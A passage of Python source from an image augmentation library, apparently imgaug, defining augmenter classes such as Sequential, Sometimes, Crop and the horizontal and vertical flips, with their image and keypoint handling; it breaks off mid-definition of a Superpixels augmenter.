"""Augment multiple images
Parameters
----------
images : array-like, shape = (num_samples, height, width, channels) or
a list of images (particularly useful for images of various
dimensions)
images to augment
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
images_result : array-like, shape = (num_samples, height, width, channels)
corresponding augmented images
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksImages()
if ia.is_np_array(images):
assert len(images.shape) == 4, "Expected 4d array of form (N, height, width, channels), got shape %s." % (str(images.shape),)
assert images.dtype == np.uint8, "Expected dtype uint8 (with value range 0 to 255), got dtype %s." % (str(images.dtype),)
images_tf = images
elif ia.is_iterable(images):
if len(images) > 0:
assert all([len(image.shape) == 3 for image in images]), "Expected list of images with each image having shape (height, width, channels), got shapes %s." % ([image.shape for image in images],)
assert all([image.dtype == np.uint8 for image in images]), "Expected dtype uint8 (with value range 0 to 255), got dtypes %s." % ([str(image.dtype) for image in images],)
images_tf = list(images)
else:
raise Exception("Expected list/tuple of numpy arrays or one numpy array, got %s." % (type(images),))
if isinstance(images_tf, list):
images_copy = [np.copy(image) for image in images]
else:
images_copy = np.copy(images)
images_copy = hooks.preprocess(images_copy, augmenter=self, parents=parents)
if hooks.is_activated(images_copy, augmenter=self, parents=parents, default=self.activated):
if len(images) > 0:
images_result = self._augment_images(
images_copy,
random_state=ia.copy_random_state(self.random_state),
parents=parents,
hooks=hooks
)
self.random_state.uniform()
else:
images_result = images_copy
else:
images_result = images_copy
images_result = hooks.postprocess(images_result, augmenter=self, parents=parents)
if self.deterministic:
self.random_state.set_state(state_orig)
if isinstance(images_result, list):
assert all([image.dtype == np.uint8 for image in images_result]), "Expected list of dtype uint8 as augmenter result, got %s." % ([image.dtype for image in images_result],)
else:
assert images_result.dtype == np.uint8, "Expected dtype uint8 as augmenter result, got %s." % (images_result.dtype,)
return images_result
@abstractmethod
def _augment_images(self, images, random_state, parents, hooks):
raise NotImplementedError()
def augment_keypoints(self, keypoints_on_images, parents=None, hooks=None):
"""Augment image keypoints
Parameters
----------
keypoints_on_images : # TODO
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
keypoints_on_images_result : # TODO
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksKeypoints()
assert ia.is_iterable(keypoints_on_images)
assert all([isinstance(keypoints_on_image, ia.KeypointsOnImage) for keypoints_on_image in keypoints_on_images])
keypoints_on_images_copy = [keypoints_on_image.deepcopy() for keypoints_on_image in keypoints_on_images]
keypoints_on_images_copy = hooks.preprocess(keypoints_on_images_copy, augmenter=self, parents=parents)
if hooks.is_activated(keypoints_on_images_copy, augmenter=self, parents=parents, default=self.activated):
if len(keypoints_on_images_copy) > 0:
keypoints_on_images_result = self._augment_keypoints(
keypoints_on_images_copy,
random_state=ia.copy_random_state(self.random_state),
parents=parents,
hooks=hooks
)
self.random_state.uniform()
else:
keypoints_on_images_result = keypoints_on_images_copy
else:
keypoints_on_images_result = keypoints_on_images_copy
keypoints_on_images_result = hooks.postprocess(keypoints_on_images_result, augmenter=self, parents=parents)
if self.deterministic:
self.random_state.set_state(state_orig)
return keypoints_on_images_result
@abstractmethod
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
raise NotImplementedError()
# TODO most of the code of this function could be replaced with ia.draw_grid()
def draw_grid(self, images, rows, cols):
if ia.is_np_array(images):
if len(images.shape) == 4:
images = [images[i] for i in range(images.shape[0])]
elif len(images.shape) == 3:
images = [images]
elif len(images.shape) == 2:
images = [images[:, :, np.newaxis]]
else:
raise Exception("Unexpected images shape, expected 2-, 3- or 4-dimensional array, got shape %s." % (images.shape,))
assert isinstance(images, list)
det = self if self.deterministic else self.to_deterministic()
augs = []
for image in images:
augs.append(det.augment_images([image] * (rows * cols)))
augs_flat = list(itertools.chain(*augs))
cell_height = max([image.shape[0] for image in images] + [image.shape[0] for image in augs_flat])
cell_width = max([image.shape[1] for image in images] + [image.shape[1] for image in augs_flat])
width = cell_width * cols
height = cell_height * (rows * len(images))
grid = np.zeros((height, width, 3))
for row_idx in range(rows):
for img_idx, image in enumerate(images):
for col_idx in range(cols):
image_aug = augs[img_idx][(row_idx * cols) + col_idx]
cell_y1 = cell_height * (row_idx * len(images) + img_idx)
cell_y2 = cell_y1 + image_aug.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image_aug.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image_aug
return grid
def show_grid(self, images, rows, cols):
"""Quickly show examples results of the applied augmentation
Parameters
----------
images : array-like, shape = (num_samples, height, width, channels) or
a list of images (particularly useful for images of various
dimensions)
images to augment
rows : integer.
number of rows in the grid
cols : integer
number of columns in the grid
"""
grid = self.draw_grid(images, rows, cols)
misc.imshow(grid)
def to_deterministic(self, n=None):
""" # TODO
"""
if n is None:
return self.to_deterministic(1)[0]
else:
return [self._to_deterministic() for _ in sm.xrange(n)]
def _to_deterministic(self):
""" # TODO
"""
aug = self.copy()
aug.random_state = ia.new_random_state()
aug.deterministic = True
return aug
def reseed(self, deterministic_too=False, random_state=None):
"""For reseeding the internal random_state
Parameters
----------
deterministic_too : boolean, optional(default=False)
# TODO
random_state : np.random.RandomState instance, optional(default=None)
random seed generator
"""
if random_state is None:
random_state = ia.current_random_state()
elif isinstance(random_state, np.random.RandomState):
pass # just use the provided random state without change
else:
random_state = ia.new_random_state(random_state)
if not self.deterministic or deterministic_too:
seed = random_state.randint(0, 10**6, 1)[0]
self.random_state = ia.new_random_state(seed)
for lst in self.get_children_lists():
for aug in lst:
aug.reseed(deterministic_too=deterministic_too, random_state=random_state)
@abstractmethod
def get_parameters(self):
raise NotImplementedError()
def get_children_lists(self):
return []
def find_augmenters(self, func, parents=None, flat=True):
""" # TODO
"""
if parents is None:
parents = []
result = []
if func(self, parents):
result.append(self)
subparents = parents + [self]
for lst in self.get_children_lists():
for aug in lst:
found = aug.find_augmenters(func, parents=subparents, flat=flat)
if len(found) > 0:
if flat:
result.extend(found)
else:
result.append(found)
return result
def find_augmenters_by_name(self, name, regex=False, flat=True):
"""Find augmenter(s) by name
Parameters
----------
name : string
name of the augmenter to find
regex : regular Expression, optional(default=False)
Regular Expression for searching the augmenter
flat : boolean, optional(default=True)
# TODO
Returns
-------
found augmenter instance
"""
return self.find_augmenters_by_names([name], regex=regex, flat=flat)
def find_augmenters_by_names(self, names, regex=False, flat=True):
"""Find augmenters by names
Parameters
----------
names : list of strings
names of the augmenter to find
regex : regular Expression, optional(default=False)
Regular Expression for searching the augmenter
flat : boolean, optional(default=True)
# TODO
Returns
-------
found augmenter instance(s)
"""
if regex:
def comparer(aug, parents):
for pattern in names:
if re.match(pattern, aug.name):
return True
return False
return self.find_augmenters(comparer, flat=flat)
else:
return self.find_augmenters(lambda aug, parents: aug.name in names, flat=flat)
def remove_augmenters(self, func, copy=True, noop_if_topmost=True):
"""Remove Augmenters from the list of augmenters
Parameters
----------
func : # TODO
copy : boolean, optional(default=True)
removing the augmenter or it's copy
noop_if_topmost : boolean, optional(default=True)
if func is provided and noop_if_topmost is True
an object of Noop class is returned
Returns
-------
aug : removed augmenter object
"""
if func(self, []):
if not copy:
raise Exception("Inplace removal of topmost augmenter requested, which is currently not possible.")
if noop_if_topmost:
return Noop()
else:
return None
else:
aug = self if not copy else self.deepcopy()
aug.remove_augmenters_inplace(func, parents=[])
return aug
def remove_augmenters_inplace(self, func, parents):
"""Inplace removal of augmenters
Parameters
----------
func : # TODO
parents : # TODO
"""
subparents = parents + [self]
for lst in self.get_children_lists():
to_remove = []
for i, aug in enumerate(lst):
if func(aug, subparents):
to_remove.append((i, aug))
for count_removed, (i, aug) in enumerate(to_remove):
# self._remove_augmenters_inplace_from_list(lst, aug, i, i - count_removed)
del lst[i - count_removed]
for aug in lst:
aug.remove_augmenters_inplace(func, subparents)
# TODO
# def to_json(self):
# pass
def copy(self):
"""Obtain a copy"""
return copy_module.copy(self)
def deepcopy(self):
"""Obtain a deep copy"""
return copy_module.deepcopy(self)
def __repr__(self):
return self.__str__()
def __str__(self):
params = self.get_parameters()
params_str = ", ".join([param.__str__() for param in params])
return "%s(name=%s, parameters=[%s], deterministic=%s)" % (self.__class__.__name__, self.name, params_str, self.deterministic)
class Sequential(Augmenter, list):
"""Sequential class is used to apply a number of transformations in an
ordered / random sequence
It is essentially an Augmenter comprising of multiple Augmenters
Parameters
----------
children : optional(default=None)
random_order : boolean, optional(default=False)
whether to apply the listed transformations in a random order
name : string, optional(default=None)
name of the object
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, children=None, random_order=False, name=None, deterministic=False, random_state=None):
Augmenter.__init__(self, name=name, deterministic=deterministic, random_state=random_state)
list.__init__(self, children if children is not None else [])
self.random_order = random_order
def _augment_images(self, images, random_state, parents, hooks):
if hooks.is_propagating(images, augmenter=self, parents=parents, default=True):
if self.random_order:
# for augmenter in self.children:
for index in random_state.permutation(len(self)):
images = self[index].augment_images(
images=images,
parents=parents + [self],
hooks=hooks
)
else:
# for augmenter in self.children:
for augmenter in self:
images = augmenter.augment_images(
images=images,
parents=parents + [self],
hooks=hooks
)
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
if hooks.is_propagating(keypoints_on_images, augmenter=self, parents=parents, default=True):
if self.random_order:
for index in random_state.permutation(len(self)):
keypoints_on_images = self[index].augment_keypoints(
keypoints_on_images=keypoints_on_images,
parents=parents + [self],
hooks=hooks
)
else:
for augmenter in self:
keypoints_on_images = augmenter.augment_keypoints(
keypoints_on_images=keypoints_on_images,
parents=parents + [self],
hooks=hooks
)
return keypoints_on_images
def _to_deterministic(self):
augs = [aug.to_deterministic() for aug in self]
seq = self.copy()
seq[:] = augs
seq.random_state = ia.new_random_state()
seq.deterministic = True
return seq
def get_parameters(self):
return []
def add(self, augmenter):
"""Add an additional augmenter"""
self.append(augmenter)
def get_children_lists(self):
"""Return all the children augmenters"""
return [self]
def __str__(self):
# augs_str = ", ".join([aug.__str__() for aug in self.children])
augs_str = ", ".join([aug.__str__() for aug in self])
return "Sequential(name=%s, augmenters=[%s], deterministic=%s)" % (self.name, augs_str, self.deterministic)
class Sometimes(Augmenter):
"""Sometimes is an Augmenter that augments according to some probability
Given the probability "p", only certain number of images will be transformed
Parameters
----------
p : float, optional(default=0.5)
determines the probability with which the associated Augmentation
will be applied. eg. value of 0.5 Augments roughly 50% of the image
samples that are up for Augmentation
then_list : optional(default=None)
# TODO
else_list : optional(default=None)
# TODO
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0.5, then_list=None, else_list=None, name=None, deterministic=False, random_state=None):
super(Sometimes, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_float(p) or ia.is_single_integer(p):
assert 0 <= p <= 1
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected float/int in range [0, 1] or StochasticParameter as p, got %s." % (type(p),))
if then_list is None:
self.then_list = Sequential([], name="%s-then" % (self.name,))
elif ia.is_iterable(then_list):
self.then_list = Sequential(then_list, name="%s-then" % (self.name,))
elif isinstance(then_list, Augmenter):
self.then_list = Sequential([then_list], name="%s-then" % (self.name,))
else:
raise Exception("Expected None, Augmenter or list/tuple as then_list, got %s." % (type(then_list),))
if else_list is None:
self.else_list = Sequential([], name="%s-else" % (self.name,))
elif ia.is_iterable(else_list):
self.else_list = Sequential(else_list, name="%s-else" % (self.name,))
elif isinstance(else_list, Augmenter):
self.else_list = Sequential([else_list], name="%s-else" % (self.name,))
else:
raise Exception("Expected None, Augmenter or list/tuple as else_list, got %s." % (type(else_list),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
if hooks.is_propagating(images, augmenter=self, parents=parents, default=True):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
# create lists/arrays of images for if and else lists (one for each)
indices_then_list = np.where(samples == 1)[0] # np.where returns tuple(array([0, 5, 9, ...])) or tuple(array([]))
indices_else_list = np.where(samples == 0)[0]
if isinstance(images, list):
images_then_list = [images[i] for i in indices_then_list]
images_else_list = [images[i] for i in indices_else_list]
else:
images_then_list = images[indices_then_list]
images_else_list = images[indices_else_list]
# augment according to if and else list
result_then_list = self.then_list.augment_images(
images=images_then_list,
parents=parents + [self],
hooks=hooks
)
result_else_list = self.else_list.augment_images(
images=images_else_list,
parents=parents + [self],
hooks=hooks
)
# map results of if/else lists back to their initial positions (in "images" variable)
result = [None] * len(images)
for idx_result_then_list, idx_images in enumerate(indices_then_list):
result[idx_images] = result_then_list[idx_result_then_list]
for idx_result_else_list, idx_images in enumerate(indices_else_list):
result[idx_images] = result_else_list[idx_result_else_list]
# if input was a list, keep the output as a list too,
# otherwise it was a numpy array, so make the output a numpy array too
if not isinstance(images, list):
result = np.array(result, dtype=np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
# TODO this is mostly copy pasted from _augment_images, make dry
result = keypoints_on_images
if hooks.is_propagating(keypoints_on_images, augmenter=self, parents=parents, default=True):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
# create lists/arrays of images for if and else lists (one for each)
indices_then_list = np.where(samples == 1)[0] # np.where returns tuple(array([0, 5, 9, ...])) or tuple(array([]))
indices_else_list = np.where(samples == 0)[0]
images_then_list = [keypoints_on_images[i] for i in indices_then_list]
images_else_list = [keypoints_on_images[i] for i in indices_else_list]
# augment according to if and else list
result_then_list = self.then_list.augment_keypoints(
keypoints_on_images=images_then_list,
parents=parents + [self],
hooks=hooks
)
result_else_list = self.else_list.augment_keypoints(
keypoints_on_images=images_else_list,
parents=parents + [self],
hooks=hooks
)
# map results of if/else lists back to their initial positions (in "images" variable)
result = [None] * len(keypoints_on_images)
for idx_result_then_list, idx_images in enumerate(indices_then_list):
result[idx_images] = result_then_list[idx_result_then_list]
for idx_result_else_list, idx_images in enumerate(indices_else_list):
result[idx_images] = result_else_list[idx_result_else_list]
return result
def _to_deterministic(self):
aug = self.copy()
aug.then_list = aug.then_list.to_deterministic()
aug.else_list = aug.else_list.to_deterministic()
aug.deterministic = True
aug.random_state = ia.new_random_state()
return aug
def get_parameters(self):
return [self.p]
def get_children_lists(self):
return [self.then_list, self.else_list]
def __str__(self):
return "Sometimes(p=%s, name=%s, then_list=[%s], else_list=[%s], deterministic=%s)" % (self.p, self.name, self.then_list, self.else_list, self.deterministic)
class Noop(Augmenter):
"""Noop is an Augmenter that does nothing
Parameters
----------
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, name=None, deterministic=False, random_state=None):
#Augmenter.__init__(self, name=name, deterministic=deterministic, random_state=random_state)
super(Noop, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
def _augment_images(self, images, random_state, parents, hooks):
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return []
class Lambda(Augmenter):
""" # TODO
"""
def __init__(self, func_images, func_keypoints, name=None, deterministic=False, random_state=None):
#Augmenter.__init__(self, name=name, deterministic=deterministic, random_state=random_state)
super(Lambda, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.func_images = func_images
self.func_keypoints = func_keypoints
def _augment_images(self, images, random_state, parents, hooks):
return self.func_images(images, random_state, parents=parents, hooks=hooks)
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
result = self.func_keypoints(keypoints_on_images, random_state, parents=parents, hooks=hooks)
assert isinstance(result, list)
assert all([isinstance(el, ia.KeypointsOnImage) for el in result])
return result
def get_parameters(self):
return []
def AssertLambda(func_images, func_keypoints, name=None, deterministic=False, random_state=None):
def func_images_assert(images, random_state, parents, hooks):
assert func_images(images, random_state, parents=parents, hooks=hooks)
return images
def func_keypoints_assert(keypoints_on_images, random_state, parents, hooks):
assert func_keypoints(keypoints_on_images, random_state, parents=parents, hooks=hooks)
return keypoints_on_images
if name is None:
name = "UnnamedAssertLambda"
return Lambda(func_images_assert, func_keypoints_assert, name=name, deterministic=deterministic, random_state=random_state)
def AssertShape(shape, check_images=True, check_keypoints=True, name=None, deterministic=False, random_state=None):
assert len(shape) == 4, "Expected shape to have length 4, got %d with shape: %s." % (len(shape), str(shape))
def compare(observed, expected, dimension, image_index):
if expected is not None:
if ia.is_single_integer(expected):
assert observed == expected, "Expected dim %d (entry index: %s) to have value %d, got %d." % (dimension, image_index, expected, observed)
elif isinstance(expected, tuple):
assert len(expected) == 2
assert expected[0] <= observed < expected[1], "Expected dim %d (entry index: %s) to have value in range [%d, %d), got %d." % (dimension, image_index, expected[0], expected[1], observed)
elif isinstance(expected, list):
assert any([observed == val for val in expected]), "Expected dim %d (entry index: %s) to have any value of %s, got %d." % (dimension, image_index, str(expected), observed)
else:
raise Exception("Invalid datatype for shape entry %d, expected each entry to be an integer, a tuple (with two entries) or a list, got %s." % (dimension, type(expected),))
def func_images(images, random_state, parents, hooks):
if check_images:
#assert is_np_array(images), "AssertShape can currently only handle numpy arrays, got "
if isinstance(images, list):
if shape[0] is not None:
compare(len(images), shape[0], 0, "ALL")
for i in sm.xrange(len(images)):
image = images[i]
assert len(image.shape) == 3, "Expected image number %d to have a shape of length 3, got %d (shape: %s)." % (i, len(image.shape), str(image.shape))
for j in sm.xrange(len(shape)-1):
expected = shape[j+1]
observed = image.shape[j]
compare(observed, expected, j, i)
else:
assert len(images.shape) == 4, "Expected image's shape to have length 4, got %d (shape: %s)." % (len(images.shape), str(images.shape))
for i in range(4):
expected = shape[i]
observed = images.shape[i]
compare(observed, expected, i, "ALL")
return images
def func_keypoints(keypoints_on_images, random_state, parents, hooks):
if check_keypoints:
#assert is_np_array(images), "AssertShape can currently only handle numpy arrays, got "
if shape[0] is not None:
compare(len(keypoints_on_images), shape[0], 0, "ALL")
for i in sm.xrange(len(keypoints_on_images)):
keypoints_on_image = keypoints_on_images[i]
for j in sm.xrange(len(shape[0:2])):
expected = shape[j+1]
observed = keypoints_on_image.shape[j]
compare(observed, expected, j, i)
return keypoints_on_images
if name is None:
name = "UnnamedAssertShape"
return Lambda(func_images, func_keypoints, name=name, deterministic=deterministic, random_state=random_state)
class Crop(Augmenter):
"""Crop Augmenter object that crops input image(s)
Parameters
----------
px : # TODO
percent : tuple, optional(default=None)
percent crop on each of the axis
keep_size : boolean, optional(default=True)
# TODO
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, px=None, percent=None, keep_size=True, name=None, deterministic=False, random_state=None):
super(Crop, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.keep_size = keep_size
self.all_sides = None
self.top = None
self.right = None
self.bottom = None
self.left = None
if px is None and percent is None:
self.mode = "noop"
elif px is not None and percent is not None:
raise Exception("Can only crop by pixels or percent, not both.")
elif px is not None:
self.mode = "px"
if ia.is_single_integer(px):
assert px >= 0
#self.top = self.right = self.bottom = self.left = Deterministic(px)
self.all_sides = Deterministic(px)
elif isinstance(px, tuple):
assert len(px) in [2, 4]
def handle_param(p):
if ia.is_single_integer(p):
assert p >= 0
return Deterministic(p)
elif isinstance(p, tuple):
assert len(p) == 2
assert ia.is_single_integer(p[0])
assert ia.is_single_integer(p[1])
assert p[0] >= 0
assert p[1] >= 0
return DiscreteUniform(p[0], p[1])
elif isinstance(p, list):
assert len(p) > 0
assert all([ia.is_single_integer(val) for val in p])
assert all([val >= 0 for val in p])
return Choice(p)
elif isinstance(p, StochasticParameter):
return p
else:
raise Exception("Expected int, tuple of two ints, list of ints or StochasticParameter, got type %s." % (type(p),))
if len(px) == 2:
#self.top = self.right = self.bottom = self.left = handle_param(px)
self.all_sides = handle_param(px)
else: # len == 4
self.top = handle_param(px[0])
self.right = handle_param(px[1])
self.bottom = handle_param(px[2])
self.left = handle_param(px[3])
elif isinstance(px, StochasticParameter):
self.top = self.right = self.bottom = self.left = px
else:
raise Exception("Expected int, tuple of 4 ints/lists/StochasticParameters or StochasticParameter, git type %s." % (type(px),))
else: # = elif percent is not None:
self.mode = "percent"
if ia.is_single_number(percent):
assert 0 <= percent < 1.0
#self.top = self.right = self.bottom = self.left = Deterministic(percent)
self.all_sides = Deterministic(percent)
elif isinstance(percent, tuple):
assert len(percent) in [2, 4]
def handle_param(p):
if ia.is_single_number(p):
return Deterministic(p)
elif isinstance(p, tuple):
assert len(p) == 2
assert ia.is_single_number(p[0])
assert ia.is_single_number(p[1])
assert 0 <= p[0] < 1.0
assert 0 <= p[1] < 1.0
return Uniform(p[0], p[1])
elif isinstance(p, list):
assert len(p) > 0
assert all([ia.is_single_number(val) for val in p])
assert all([0 <= val < 1.0 for val in p])
return Choice(p)
elif isinstance(p, StochasticParameter):
return p
else:
raise Exception("Expected int, tuple of two ints, list of ints or StochasticParameter, got type %s." % (type(p),))
if len(percent) == 2:
#self.top = self.right = self.bottom = self.left = handle_param(percent)
self.all_sides = handle_param(percent)
else: # len == 4
self.top = handle_param(percent[0])
self.right = handle_param(percent[1])
self.bottom = handle_param(percent[2])
self.left = handle_param(percent[3])
elif isinstance(percent, StochasticParameter):
self.top = self.right = self.bottom = self.left = percent
else:
raise Exception("Expected number, tuple of 4 numbers/lists/StochasticParameters or StochasticParameter, got type %s." % (type(percent),))
def _augment_images(self, images, random_state, parents, hooks):
result = []
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
seed = seeds[i]
height, width = images[i].shape[0:2]
top, right, bottom, left = self._draw_samples_image(seed, height, width)
image_cropped = images[i][top:height-bottom, left:width-right, :]
if self.keep_size:
image_cropped = ia.imresize_single_image(image_cropped, (height, width))
result.append(image_cropped)
if not isinstance(images, list):
if self.keep_size:
result = np.array(result, dtype=np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
result = []
nb_images = len(keypoints_on_images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i, keypoints_on_image in enumerate(keypoints_on_images):
seed = seeds[i]
height, width = keypoints_on_image.shape[0:2]
top, right, bottom, left = self._draw_samples_image(seed, height, width)
shifted = keypoints_on_image.shift(x=-left, y=-top)
shifted.shape = (height - top - bottom, width - left - right)
if self.keep_size:
result.append(shifted.on(keypoints_on_image.shape))
else:
result.append(shifted)
return result
def _draw_samples_image(self, seed, height, width):
random_state = ia.new_random_state(seed)
if self.all_sides is not None:
samples = self.all_sides.draw_samples((4,), random_state=random_state)
top, right, bottom, left = samples
else:
rs_top = random_state
rs_right = rs_top
rs_bottom = rs_top
rs_left = rs_top
top = self.top.draw_sample(random_state=rs_top)
right = self.right.draw_sample(random_state=rs_right)
bottom = self.bottom.draw_sample(random_state=rs_bottom)
left = self.left.draw_sample(random_state=rs_left)
if self.mode == "px":
# no change necessary for pixel values
pass
elif self.mode == "percent":
# percentage values have to be transformed to pixel values
top = int(height * top)
right = int(width * right)
bottom = int(height * bottom)
left = int(width * left)
else:
raise Exception("Invalid mode")
remaining_height = height - (top + bottom)
remaining_width = width - (left + right)
if remaining_height < 1:
regain = abs(remaining_height) + 1
regain_top = regain // 2
regain_bottom = regain // 2
if regain_top + regain_bottom < regain:
regain_top += 1
if regain_top > top:
diff = regain_top - top
regain_top = top
regain_bottom += diff
elif regain_bottom > bottom:
diff = regain_bottom - bottom
regain_bottom = bottom
regain_top += diff
assert regain_top <= top
assert regain_bottom <= bottom
top = top - regain_top
bottom = bottom - regain_bottom
if remaining_width < 1:
regain = abs(remaining_width) + 1
regain_right = regain // 2
regain_left = regain // 2
if regain_right + regain_left < regain:
regain_right += 1
if regain_right > right:
diff = regain_right - right
regain_right = right
regain_left += diff
elif regain_left > left:
diff = regain_left - left
regain_left = left
regain_right += diff
assert regain_right <= right
assert regain_left <= left
right = right - regain_right
left = left - regain_left
assert top >= 0 and right >= 0 and bottom >= 0 and left >= 0
assert top + bottom < height
assert right + left < width
return top, right, bottom, left
def get_parameters(self):
return [self.top, self.right, self.bottom, self.left]
class Fliplr(Augmenter):
"""Flip the input images horizontally
Parameters
----------
p : int, float or StochasticParameter
number or percentage of samples to Flip
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Fliplr, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p):
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected p to be int or float or StochasticParameter, got %s." % (type(p),))
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.fliplr(images[i])
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
width = keypoints_on_image.shape[1]
for keypoint in keypoints_on_image.keypoints:
keypoint.x = (width - 1) - keypoint.x
return keypoints_on_images
def get_parameters(self):
return [self.p]
class Flipud(Augmenter):
"""Flip the input images vertically
Parameters
----------
p : int, float or StochasticParameter
number or percentage of samples to Flip
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Flipud, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p):
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected p to be int or float or StochasticParameter, got %s." % (type(p),))
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.flipud(images[i])
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
height = keypoints_on_image.shape[0]
for keypoint in keypoints_on_image.keypoints:
keypoint.y = (height - 1) - keypoint.y
return keypoints_on_images
def get_parameters(self):
return [self.p]
# TODO tests
class Superpixels(Augmenter):
"""Transform images to their superpixel representation.
This implementation uses skimage's version of the SLIC algorithm.
Parameters
----------
p_replace : int/float, tuple/list of ints/floats or StochasticParameter, optional (default=0)
Defines the probability of any superpixel area being replaced by the
superpixel, i.e. by the average pixel color within its area.
A probability of 0 would mean, that no superpixel area is replaced by
its average (image is not changed at all).
A probability of 0.5 would mean, that half of all superpixels are
replaced by their average color.
A probability of 1.0 would mean, that all superpixels are replaced
by their average color (resulting in a standard superpixel image).
This parameter can be a tuple (a, b), e.g. (0.5, 1.0). In this case,
a random probability p with a <= p <= b will be rolled per image.
n_segments : int, tuple/list of ints, StochasticParameter, optional (default=100)
Number of superpixels to generate.
max_size : int, None, optional (default=128)
Maximum image size at which the superpixels are generated.
If the width or height of an image exceeds this value, it will be
downscaled so that the longest side matches max_size.
This is done to speed up the superpixel algorithm.
Use None to apply no downscaling.
interpolation : int, string (default="linear")
Interpolation method to use during downscaling when max_size is
exceeded. Valid methods are the same as in ia.imresize_single_image().
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p_replace=0, n_segments=100, max_size=128, interpolation="linear", name=None, deterministic=False, random_state=None):
super(Superpixels, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p_replace):
self.p_replace = Binomial(p_replace)
elif ia.is_iterable(p_replace):
assert len(p_replace) == 2
assert p_replace[0] < p_replace[1]
